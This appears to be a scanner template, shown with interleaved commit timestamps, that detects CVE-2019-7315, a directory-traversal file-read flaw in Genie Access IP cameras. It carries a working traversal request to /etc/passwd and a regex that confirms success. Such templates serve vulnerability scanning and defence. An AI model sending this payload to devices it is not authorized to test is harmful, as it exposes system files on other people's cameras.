2022-06-23 08:31:47 +00:00
id : CVE-2019-7315
2022-07-26 13:45:11 +00:00
2022-06-23 08:31:47 +00:00
info :
2022-07-26 13:45:11 +00:00
name : Genie Access WIP3BVAF IP Camera - Local File Inclusion
2022-06-23 08:31:47 +00:00
author : 0x_Akoko
severity : high
2022-07-26 13:45:11 +00:00
description : Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow.
2022-06-23 08:31:47 +00:00
reference :
2022-06-23 18:29:11 +00:00
- https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/
2022-06-23 08:31:47 +00:00
- https://vuldb.com/?id.136593
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-7315
2022-06-23 08:31:47 +00:00
classification :
2022-06-23 18:52:41 +00:00
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-06-23 08:31:47 +00:00
cvss-score : 7.5
cve-id : CVE-2019-7315
cwe-id : CWE-22
2022-06-23 18:29:11 +00:00
tags : cve,cve2019,camera,genie,lfi,iot
2022-06-23 08:31:47 +00:00
requests :
- method : GET
path :
2022-06-23 18:29:11 +00:00
- "{{BaseURL}}/../../../../../etc/passwd"
2022-06-23 08:31:47 +00:00
matchers-condition : and
matchers :
2022-06-23 18:29:11 +00:00
- type : regex
2022-06-23 08:31:47 +00:00
part : body
2022-06-23 18:29:11 +00:00
regex :
- "root:.*:0:0:"
2022-06-23 08:31:47 +00:00
- type : status
status :
- 200
2022-07-26 13:45:11 +00:00
# Enhanced by mp on 2022/07/08